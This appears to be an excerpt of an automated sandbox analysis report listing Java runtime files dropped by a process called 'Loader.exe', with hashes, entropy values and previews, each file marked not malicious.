                                                                                                                                                                                                                                                                                                              SHA1:7814DF0FF2EA1827C75DCD73844CA7F025998CC6
                                                                                                                                                                                                                                                                                                              SHA-256:A73AEA3074360CF62ADEDC0C82BC9C0C36C6A777C70DA6C544D0FBA7B2D8529E
                                                                                                                                                                                                                                                                                                              SHA-512:97B9D4C68AC4B534F86EFA9AF947763EE61AEE6086581D96CBF7B3DBD6FD5D9DB4B4D16772DCE6F347B44085CEF8A6EA3BFD3B84FBD9D4EF763CEF39255FBCE3
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# Copyright (c) 2001, 2013, Oracle and/or its affiliates. All rights reserved...# ORACLE PROPRIETARY/CONFIDENTIAL. Use is subject to license terms...#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..#..# List of JVMs that can be used as an option to java, javac, etc...# Order is important -- first in this list is the default JVM...# NOTE that this both this file and its format are UNSUPPORTED and..# WILL GO AWAY in a future release...#..# You may also select a JVM in an arbitrary location with the..# "-XXaltjvm=<jvm_dir>" option, but that too is unsupported..# and may not be available in a future release...#..-client KNOWN..-server KNOWN..
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):1320
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.02145006262851
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:n3lG0Bf4dJ0qEAmG620WKG0WBph8T2AGjGg0kz8lrbfOi7:3E0Bf4qrzrlWzy+ckUfP
                                                                                                                                                                                                                                                                                                              MD5:01B94C63BD5E6D094E84FF3AD640FFBF
                                                                                                                                                                                                                                                                                                              SHA1:5570F355456250B1EC902375B0257584DB2360AE
                                                                                                                                                                                                                                                                                                              SHA-256:52845DEB58038B4375C30B75DD2053726872758C96597C7CC5D6CEF11F42A2BA
                                                                                                                                                                                                                                                                                                              SHA-512:816BE2271CF3ECF10EE40E24A288CE302B2810010BEF76EFC0CE5746591955921B70F19005335F485D61A7B216DCCE0B06750831720DD426D07709154D5FAC7A
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#..#..# Cursors Properties file..#..# Names GIF89 sources for Custom Cursors and their associated HotSpots..#..# Note: the syntax of the property name is significant and is parsed..# by java.awt.Cursor..#..# The syntax is: Cursor.<name>.<geom>.File=win32_<filename>..# Cursor.<name>.<geom>.HotSpot=<x>,<y>..#. Cursor.<name>.<geom>.Name=<localized name>..#..Cursor.CopyDrop.32x32.File=win32_CopyDrop32x32.gif..Cursor.CopyDrop.32x32.HotSpot=0,0..Cursor.CopyDrop.32x32.Name=CopyDrop32x32..#..Cursor.MoveDrop.32x32.File=win32_MoveDrop32x32.gif..Cursor.MoveDrop.32x32.HotSpot=0,0..Cursor.MoveDrop.32x32.Name=MoveDrop32x32..#..Cursor.LinkDrop.32x32.File=win32_LinkDrop32x32.gif..Cursor.LinkDrop.32x32.HotSpot=0,0..Cursor.LinkDrop.32x32.Name=LinkDrop32x32..#..Cursor.CopyNoDrop.32x32.File=win32_CopyNoDrop32x32.gif..Cursor.CopyNoDrop.32x32.HotSpot=6,2..Cursor.CopyNoDrop.32x32.Name=CopyNoDrop32x32..#..Cursor.MoveNoDrop.32x32.File=win32_MoveNoDrop32x32.gif..Cursor.MoveNoDrop.32x32.Ho
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                                                                                              MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                                                                                              SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                                                                                              SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                                                                                              SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a . ................!.......,.... . ...j.?...o..T....._]-..9.`..D...f........^...n.`.%C......<..E..S&QL.....n+...R....'|N...."U........(8HXhx.X..;
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):165
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.347455736310776
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CruuU/XExlHrBwM7Qt/wCvTjh2Azr8ptBNKtWwUzJ7Ful5u44JyYChWn:KP0URwMcx3UAzADBNwUlBul5TLYMWn
                                                                                                                                                                                                                                                                                                              MD5:89CDF623E11AAF0407328FD3ADA32C07
                                                                                                                                                                                                                                                                                                              SHA1:AE813939F9A52E7B59927F531CE8757636FF8082
                                                                                                                                                                                                                                                                                                              SHA-256:13C783ACD580DF27207DABCCB10B3F0C14674560A23943AC7233DF7F72D4E49D
                                                                                                                                                                                                                                                                                                              SHA-512:2A35311D7DB5466697D7284DE75BABEE9BD0F0E2B20543332FCB6813F06DEBF2457A9C0CF569449C37F371BFEB0D81FB0D219E82B9A77ACC6BAFA07499EAC2F7
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.. ................!.......,...... ...vL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.. V..9'......f.T....w.xW.B.....P..;
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):168
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.465243369905675
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CruuU/XExlHrZauowM7Qt/wCvTjh2Azr8ptBNKtWwUzJZmQYRNbC1MIQvEn:KP0UpawMcx3UAzADBNwUlZaCzn
                                                                                                                                                                                                                                                                                                              MD5:694A59EFDE0648F49FA448A46C4D8948
                                                                                                                                                                                                                                                                                                              SHA1:4B3843CBD4F112A90D112A37957684C843D68E83
                                                                                                                                                                                                                                                                                                              SHA-256:485CBE5C5144CFCD13CC6D701CDAB96E4A6F8660CBC70A0A58F1B7916BE64198
                                                                                                                                                                                                                                                                                                              SHA-512:CF2DFD500AF64B63CC080151BC5B9DE59EDB99F0E31676056CF1AFBC9D6E2E5AF18DC40E393E043BBBBCB26F42D425AF71CCE6D283E838E67E61D826ED6ECD27
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.. ................!.......,...... ...yL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj........k.-mF.6.'.....`1]......u.Q.r.V..C......f.P..;
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 31 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):147
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.147949937659802
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CruuU/XExlHrSauZKwM7Qt/wCvTjh2Azr8ptBNKtWXOh6WoXt2W:KP0UvEKwMcx3UAzADBNXOh6h9p
                                                                                                                                                                                                                                                                                                              MD5:CC8DD9AB7DDF6EFA2F3B8BCFA31115C0
                                                                                                                                                                                                                                                                                                              SHA1:1333F489AC0506D7DC98656A515FEEB6E87E27F9
                                                                                                                                                                                                                                                                                                              SHA-256:12CFCE05229DBA939CE13375D65CA7D303CE87851AE15539C02F11D1DC824338
                                                                                                                                                                                                                                                                                                              SHA-512:9857B329ACD0DB45EA8C16E945B4CFA6DF9445A1EF457E4B8B40740720E8C658301FC3AB8BDD242B7697A65AE1436FD444F1968BD29DA6A89725CDDE1DE387B8
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:GIF89a.. ................!.......,...... ...dL...-....F....o.U.8J..'J.....3...a...."...")..=fPHS......h.Zc.KDj.....-.kj..m.....X,&.......S..;
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 32 x 32
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):153
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.2813106319833665
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:Csl7X/7/xlXlLaFGkDPF4V0Pee1F/sjtH5ybOCb1C3sxlWn:NljDjkFHF4V0Peene15tutsn
                                                                                                                                                                                                                                                                                                              MD5:1E9D8F133A442DA6B0C74D49BC84A341
                                                                                                                                                                                                                                                                                                              SHA1:259EDC45B4569427E8319895A444F4295D54348F
                                                                                                                                                                                                                                                                                                              SHA-256:1A1D3079D49583837662B84E11D8C0870698511D9110E710EB8E7EB20DF7AE3B
                                                                                                                                                                                                                                                                                                              SHA-512:63D6F70C8CAB9735F0F857F5BF99E319F6AE98238DC7829DD706B7D6855C70BE206E32E3E55DF884402483CF8BEBAD00D139283AF5C0B85DC1C5BF8F253ACD37
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):58
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4779965120705425
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:3:CEBqRM9LTAGQdLV6ETEBqRM9LHQIuHPy:CEAsnAbLlszQdy
                                                                                                                                                                                                                                                                                                              MD5:3C2B9CCAAD3D986E5874E8C0F82C37CF
                                                                                                                                                                                                                                                                                                              SHA1:D1DDA4A2D5D37249C8878437DBF36C6AE61C33D1
                                                                                                                                                                                                                                                                                                              SHA-256:D5BCD7D43E383D33B904CFF6C80ACE359DBE2CE2796E51E9743358BD650E4198
                                                                                                                                                                                                                                                                                                              SHA-512:4350CCA847D214479C6AE430EB71EE98A220EA10EC175D0AB317A8B43ABC9B4054E41D0FF383F26D593DE825F761FB93704E37292831900F31E5E38167A41BAB
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:javafx.runtime.version=8.0.101..javafx.runtime.build=b13..
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):476286
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.905283162751186
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:k4VtaECp5plmgYhuWvHuR9Ta/+Aw7okxygk+W:kUChlHYHMaHw7XxW
                                                                                                                                                                                                                                                                                                              MD5:5D8C1723F3005BD63DBA2B478CE15621
                                                                                                                                                                                                                                                                                                              SHA1:AB26A6167789DCF81A0C40D121DC91005804C703
                                                                                                                                                                                                                                                                                                              SHA-256:B637B78CFC33C92D4838D5FABFD0647CE03C3EF69D86EF6A7E6F229510AAF3B5
                                                                                                                                                                                                                                                                                                              SHA-512:9830CCDFE913A492BB4E0015EE3E729BEA8EC1F22EDF48ED7CE2AEFD5376DF24F33948B9155E31EDFA9BC240544406FD2C43A34DD1366E4936B3318D3CA5ED1C
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK...........H................META-INF/....PK...........H...7Z...e.......META-INF/MANIFEST.MF.M..LK-...K-*...R0.3..r.C.q,HL.HU...%...y...R.KRSt.*...L....u....4....sR......K..5y.x..PK...........H................com/PK...........H................com/sun/PK...........H................com/sun/javaws/PK...........H................com/sun/javaws/exceptions/PK...........H................com/sun/javaws/jnl/PK...........H................com/sun/javaws/net/PK...........H................com/sun/javaws/net/protocol/PK...........H............ ...com/sun/javaws/net/protocol/jar/PK...........H................com/sun/javaws/progress/PK...........H................com/sun/javaws/security/PK...........H................com/sun/javaws/ui/PK...........H................com/sun/javaws/util/PK...........H................com/sun/jnlp/PK...........H................javax/PK...........H................javax/jnlp/PK...........H~p4=........#...com/sun/javaws/BrowserSupport.class.RMO.1.}...].H @.|.|(...P..B.....
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):114950
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.912507028584016
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:1536:5sNJO+ylt6se6sgU0w/XzGYWuSy15DudYLSfaxwpt5g1naZEqwoJ8sYcF+z/VSG8:aj8GHXZSy1pudYLdQe1ATtKVS+ws9O
                                                                                                                                                                                                                                                                                                              MD5:A39F61D6ED2585519D7AF1E2EA029F59
                                                                                                                                                                                                                                                                                                              SHA1:52515AC6DEAB634F3495FD724DEA643EE442B8FD
                                                                                                                                                                                                                                                                                                              SHA-256:60724D9E372FBE42759349A06D3426380CA2B9162FA01EB2C3587A58A34AD7E0
                                                                                                                                                                                                                                                                                                              SHA-512:AC2E9AB749F5365BE0FB8EBD321E8F231D22EAE396053745F047FCBCCF8D3DE2F737D3C37A52C715ADDFBDBD18F14809E8B37B382B018B58A76E063EFBA96948
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):560553
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.781566946934384
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:12288:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f/m5NwaHkSIJHvWQ6Q7ooMcgH5lY7TQ5cD:G5l+qU67FYWg+YWgYWeoXqgYSq8eh2f3
                                                                                                                                                                                                                                                                                                              MD5:CCB395235C35C3ACBA592B21138CC6AB
                                                                                                                                                                                                                                                                                                              SHA1:29C463AA4780F13E77FB08CC151F68CA2B2958D5
                                                                                                                                                                                                                                                                                                              SHA-256:27AD8EA5192EE2D91BA7A0EACE9843CB19F5E145259466158C2F48C971EB7B8F
                                                                                                                                                                                                                                                                                                              SHA-512:D4C330741387F62DD6E52B41167CB11ABD8615675FE7E1C14AE05A52F87A348CBC64B56866AE313B2906B33CE98BE73681F769A4A54F6FE9A7D056F88CF9A4E1
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:PK........t..H................META-INF/....PK........t..H.s0>...>.......META-INF/MANIFEST.MFManifest-Version: 1.0..Implementation-Vendor: Oracle Corporation..Implementation-Title: Java Runtime Environment..Implementation-Version: 1.8.0_101..Specification-Vendor: Oracle Corporation..Created-By: 1.7.0_07 (Oracle Corporation)..Specification-Title: Java Platform API Specification..Specification-Version: 1.8....PK...........HB.<>^...^...8...com/oracle/jrockit/jfr/client/EventSettingsBuilder.class.......4....5.f..g....f..4.h..4.i..j....f..4.k..l....m..4.n..o....f..4.p..q..r....f....s....t....u....v..w..x..y....z..{....|....}....~.................................#.........................)...................................................eventDefaultSets...Ljava/util/ArrayList;...Signature..DLjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventDefaultSet;>;...settings..ALjava/util/ArrayList<Loracle/jrockit/jfr/settings/EventSetting;>;...eventDescriptorType..2Loracle/jrockit/jfr/openmbean/
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20670
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.627043889535612
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:VOMjUVCEM0Ut0ZINFWbqsZSwOVzx8xyxxxbAJ1muS7khPdyPsXZd2ZhptEgReW82:VONVTVgF9SsTMLA
                                                                                                                                                                                                                                                                                                              MD5:47495DA4E7B3AF33F5C3ED1E35AC25AE
                                                                                                                                                                                                                                                                                                              SHA1:F6DE88A4C6AE0C14B9F875FB4BC4721A104CB0EE
                                                                                                                                                                                                                                                                                                              SHA-256:37D19EAC73DEEB613FBB539AE7E7C99339939EB3EFEC44E9EB45F68426E9F159
                                                                                                                                                                                                                                                                                                              SHA-512:74DBEB118575B8881D5B43270EF878162DBDC222AC6D20F04699B2B733427347ABC76D6E82BF7728FCC435129B114E4C75D011FC5DDDEAF5A59E137BBC81F2B9
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Continuous" description="Low overhead configuration safe for continuous use in production environments, typically less than 1 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="fals
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):20626
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.626761353117893
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8"?>.... .. Recommended way to edit .jfc files is to use Java Mission Control,.. see Window -> Flight Recorder Template Manager...-->....<configuration version="1.0" name="Profiling" description="Low overhead configuration for profiling, typically around 2 % overhead." provider="Oracle">.... <producer uri="http://www.oracle.com/hotspot/jvm/" label="Oracle JDK">.... <control>.... .. Contents of the control element is not read by the JVM, it's used.. by Java Mission Control to change settings that carry the control attribute... -->.... <selection name="gc-level" default="detailed" label="Garbage Collector">.. <option label="Off" name="off">off</option>.. <option label="Normal" name="detailed">normal</option>.. <option label="All" name="all">all</option>.. </selection>.... <condition name="gc-enabled-normal" true="true" false="false">.. <or>.. <test name="
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):33932
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.930702746433849
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):633957
                                                                                                                                                                                                                                                                                                              Entropy (8bit):6.018176262975427
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Algol 68 source, ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4312
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.756104846669624
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:Copyright (c) 2003, 2005, Oracle and/or its affiliates. All rights reserved.....Redistribution and use in source and binary forms, with or without..modification, are permitted provided that the following conditions..are met:.... - Redistributions of source code must retain the above copyright.. notice, this list of conditions and the following disclaimer..... - Redistributions in binary form must reproduce the above copyright.. notice, this list of conditions and the following disclaimer in the.. documentation and/or other materials provided with the distribution..... - Neither the name of Oracle nor the names of its.. contributors may be used to endorse or promote products derived.. from this software without specific prior written permission.....THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS..IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,..THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR..PURP
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2514
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.525846572478507
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:############################################################..# .Default Logging Configuration File..#..# You can use a different file by specifying a filename..# with the java.util.logging.config.file system property. ..# For example java -Djava.util.logging.config.file=myfile..############################################################....############################################################..# .Global properties..############################################################....# "handlers" specifies a comma separated list of log Handler ..# classes. These handlers will be installed during VM startup...# Note that these classes must be on the system classpath...# By default we only configure a ConsoleHandler, which will only..# show messages at the INFO and above levels...handlers= java.util.logging.ConsoleHandler....# To also add the FileHandler, use the following line instead...#handlers= java.util.logging.FileHandler, java.util.logging.ConsoleHandler....# Default global
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:Java archive data (JAR)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):381
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.99308306420453
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):4077
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.472483528668558
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:######################################################################..# Default Access Control File for Remote JMX(TM) Monitoring..######################################################################..#..# Access control file for Remote JMX API access to monitoring...# This file defines the allowed access for different roles. The..# password file (jmxremote.password by default) defines the roles and their..# passwords. To be functional, a role must have an entry in..# both the password and the access files...#..# The default location of this file is $JRE/lib/management/jmxremote.access..# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# (See that file for details)..#..# The file format for password and access files is syntactically the same..# as the Properties file format. The syntax is described in the Javadoc..# for java.util.Properties.load...# A typical access file has multiple
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2920
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.545881645777106
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# ----------------------------------------------------------------------..# Template for jmxremote.password..#..# o Copy this template to jmxremote.password..# o Set the user/password entries in jmxremote.password..# o Change the permission of jmxremote.password to read-only..# by the owner...#..# See below for the location of jmxremote.password file...# ----------------------------------------------------------------------....##############################################################..# Password File for Remote JMX Monitoring..##############################################################..#..# Password file for Remote JMX API access to monitoring. This..# file defines the different roles and their passwords. The access..# control file (jmxremote.access by default) defines the allowed..# access for each role. To be functional, a role must have an entry..# in both the password and the access files...#..# Default location of this file is $JRE/lib/management/jmx
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):14415
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.623139916889837
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:#####################################################################..#.Default Configuration File for Java Platform Management..#####################################################################..#..# The Management Configuration file (in java.util.Properties format)..# will be read if one of the following system properties is set:..# -Dcom.sun.management.jmxremote.port=<port-number>..# or -Dcom.sun.management.snmp.port=<port-number>..# or -Dcom.sun.management.config.file=<this-file>..#..# The default Management Configuration file is:..#..# $JRE/lib/management/management.properties..#..# Another location for the Management Configuration File can be specified..# by the following property on the Java command line:..#..# -Dcom.sun.management.config.file=<this-file>..#..# If -Dcom.sun.management.config.file=<this-file> is set, the port..# number for the management agent can be specified in the config file..# using the following lines:..#..# ################ Management Agen
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3486
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.4357861198752975
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:# ----------------------------------------------------------------------..# Template for SNMP Access Control List File..#..# o Copy this template to snmp.acl..# o Set access control for SNMP support..# o Change the permission of snmp.acl to be read-only..# by the owner...#..# See below for the location of snmp.acl file...# ----------------------------------------------------------------------....############################################################..# SNMP Access Control List File ..############################################################..#..# Default location of this file is $JRE/lib/management/snmp.acl...# You can specify an alternate location by specifying a property in ..# the management config file $JRE/lib/management/management.properties..# or by specifying a system property (See that file for details)...#......##############################################################..# File permissions of the snmp.acl file..######################
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):2126
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.970874214349507
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Preview:% VERSION 2..% WARNING: this file is auto-generated; do not edit..% UNSUPPORTED: this file and its format may change and/or..% may be removed in a future release..# charsets.jar..sun/nio..sun/awt..# jce.jar..javax/crypto..sun/security..META-INF/ORACLE_J.RSA..META-INF/ORACLE_J.SF..# jfr.jar..oracle/jrockit/..jdk/jfr..com/oracle/jrockit/..! jsse.jar..sun/security..com/sun/net/..! management-agent.jar..@ resources.jar..com/sun/java/util/jar/pack/..META-INF/services/sun.util.spi.XmlPropertiesProvider..META-INF/services/javax.print.PrintServiceLookup..com/sun/corba/..META-INF/services/javax.sound.midi.spi.SoundbankReader..sun/print..META-INF/services/javax.sound.midi.spi.MidiFileReader..META-INF/services/sun.java2d.cmm.CMMServiceProvider..javax/swing..META-INF/services/javax.sound.sampled.spi.AudioFileReader..META-INF/services/javax.sound.midi.spi.MidiDeviceProvider..sun/net..META-INF/services/javax.sound.sampled.spi.AudioFileWriter..com/sun/imageio/..META-INF/services/sun.java2d.pipe.Ren
                                                                                                                                                                                                                                                                                                              Process:C:\Users\user\Desktop\Loader.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
